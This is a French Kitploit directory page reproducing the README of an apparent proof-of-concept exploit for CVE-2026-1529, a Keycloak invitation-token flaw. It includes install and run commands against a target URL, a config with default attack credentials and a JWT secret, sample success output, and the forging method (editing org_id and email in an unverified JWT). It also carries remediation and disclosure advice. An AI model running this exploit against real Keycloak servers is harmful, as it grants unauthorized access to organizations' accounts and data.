Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529 (PoC) est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation inappropriée des jetons d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour enregistrer des utilisateurs dans des organisations non autorisées. | Kitploit
Outils/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Voir le dépôt
il y a 6 moisPas encore vérifié

À propos

CVE-2026-1529 (PoC) est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation inappropriée des jetons d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour enregistrer des utilisateurs dans des organisations non autorisées.

Partager

Outil d'exploitation Keycloak CVE-2026-1529

Keycloak : enregistrement non autorisé dans une organisation via une validation incorrecte du jeton d'invitation


Avertissement

Cet outil est réservé à des fins éducatives et de tests de sécurité. Utilisez-le uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de tester. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique. Les auteurs de cet outil ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce logiciel.

Créé par : f3ds cr3w est, 2002


Présentation

CVE-2026-1529 est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation incorrecte du jeton d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour inscrire des utilisateurs dans des organisations non autorisées.

Détails techniques

  • Identifiant CVE : CVE-2026-1529
  • Logiciel affecté : Keycloak (org.keycloak.services.resources.organizations)
  • Score CVSS : 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vecteur d'attaque : Réseau
  • Complexité d'attaque : Faible
  • Impact : Accès non autorisé aux ressources de l'organisation

Description de la vulnérabilité

La vulnérabilité réside dans le processus de validation des jetons JWT pour les invitations d'organisation. Les attaquants peuvent manipuler les champs org_id et email dans la charge utile du JWT, ce qui leur permet d'inscrire des utilisateurs dans n'importe quelle organisation sans autorisation appropriée.


Installation

Prérequis

  • Python 3.7 ou version ultérieure
  • Gestionnaire de paquets pip

Mise en place

  1. Clonez ou téléchargez l'outil d'exploitation :
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installez les dépendances requises :
root@kitploit:~
pip install -r requirements.txt
  1. Rendez le script d'exploitation exécutable :
root@kitploit:~
chmod +x keycloak-exploit.py

Utilisation

Utilisation de base

root@kitploit:~
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Utilisation avancée

root@kitploit:~
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Options de la ligne de commande


Sortie

Exploitation réussie

Lorsque l'exploitation réussit, vous verrez une sortie comme :

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Échec de l'exploitation

Si l'exploitation échoue, vous verrez :

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Structure du projet

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configuration

Configuration par défaut

L'outil utilise un fichier de configuration par défaut (config/default_config.json) avec les paramètres suivants :

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configuration personnalisée

Vous pouvez créer un fichier de configuration personnalisé et l'utiliser avec l'option -c :

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Détails techniques

Processus d'exploitation

  1. Analyse de la cible : Vérifier si la cible est une instance Keycloak vulnérable
  2. Génération du jeton : Générer ou utiliser un jeton d'invitation personnalisé
  3. Manipulation du jeton : Manipuler la charge utile du JWT pour changer l'identifiant de l'organisation
  4. Inscription de l'utilisateur : Inscrire un utilisateur à l'aide du jeton manipulé
  5. Test de connexion : Vérifier que l'utilisateur créé peut se connecter
  6. Génération du rapport : Créer un rapport d'exploitation détaillé

Manipulation du JWT

L'outil exploite la validation JWT incorrecte en :

  1. Décodant le jeton JWT sans vérification de la signature
  2. Modifiant le champ org_id pour cibler une autre organisation
  3. Modifiant le champ email si nécessaire
  4. Réencodant le jeton avec la charge utile manipulée

Considérations de sécurité

  • L'outil utilise une gestion des erreurs et une journalisation appropriées
  • Toutes les requêtes réseau incluent des en-têtes appropriés
  • Une validation des entrées est effectuée sur toutes les entrées utilisateur
  • L'outil respecte les codes de réponse du serveur cible

Dépannage

Problèmes courants

  1. Erreurs de connexion

    • Vérifiez si l'URL cible est accessible
    • Vérifiez que la cible est une instance Keycloak
    • Vérifiez la connectivité réseau et les paramètres du pare-feu
  2. Erreurs de validation du jeton

    • Assurez-vous que le format du jeton est correct
    • Vérifiez si le jeton contient les champs requis (org_id, email, invitation_type)
    • Vérifiez que le jeton n'est pas expiré
  3. Échecs d'inscription

    • Vérifiez si le point de terminaison d'inscription est accessible
    • Vérifiez le format du jeton manipulé
    • Vérifiez si l'enregistrement d'organisation est activé sur la cible

Mode débogage

Activez la journalisation de débogage pour un dépannage détaillé :

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

Fichiers journaux

  • Journal principal : logs/exploit.log
  • Rapports : output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Méthodologie de test

Évaluation de la vulnérabilité

L'outil effectue les vérifications suivantes :

  1. Contrôle de santé : Vérifie que la cible est une instance Keycloak
  2. Détection de version : Tente de détecter la version de Keycloak
  3. Test des points de terminaison : Teste les points de terminaison liés aux organisations
  4. Validation du jeton : Valide la structure du jeton JWT

Validation de l'exploitation

L'exploitation est considérée comme réussie si :

  1. La cible est vulnérable
  2. Un utilisateur peut être inscrit à l'aide du jeton manipulé
  3. L'utilisateur inscrit peut se connecter avec succès
  4. Un lien de connexion valide est généré

Bonnes pratiques de sécurité

Pour les organisations

  1. Appliquer les correctifs : Mettre à jour vers la dernière version de Keycloak
  2. Validation des jetons : Mettre en œuvre une vérification appropriée de la signature JWT
  3. Contrôle d'accès : Restreindre l'enregistrement des organisations aux utilisateurs autorisés
  4. Surveillance : Surveiller les activités d'inscription suspectes
  5. Sécurité réseau : Mettre en œuvre des règles de pare-feu appropriées

Pour les chercheurs en sécurité

  1. Autorisation : Ne testez que les systèmes pour lesquels vous avez la permission de tester
  2. Divulgation responsable : Signalez les vulnérabilités aux éditeurs
  3. Documentation : Conservez des enregistrements détaillés de vos tests
  4. Tests éthiques : Suivez les pratiques de divulgation responsable

Licence

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité. Utilisez-le à vos propres risques.

Créé par : f3ds cr3w est, 2002

Contact : Pour toute question ou retour, veuillez vous référer au dépôt du projet.


Journal des modifications

Version 1.0

  • Version initiale
  • Fonctionnalité d'exploitation de base
  • Capacités de manipulation JWT
  • Génération de rapports
  • Interface en ligne de commande

🙏 Remerciements

  • Équipe de développement de Keycloak
  • Chercheurs en sécurité qui ont découvert CVE-2026-1529
  • La communauté de la sécurité open source

Souvenez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez cet outil avec sagesse et éthique.

par f3ds cr3w est, 2002

Télécharger l’outil
OptionDescriptionRequis
targetURL Keycloak cible (IP ou domaine)Oui
-t, --tokenJeton d'invitation personnalisé à utiliserNon
-o, --org-idIdentifiant d'organisation personnaliséNon
-c, --configChemin vers le fichier de configurationNon
-d, --debugActiver la journalisation de débogageNon
-v, --versionAfficher les informations de versionNon
-h, --helpAfficher le message d'aideNon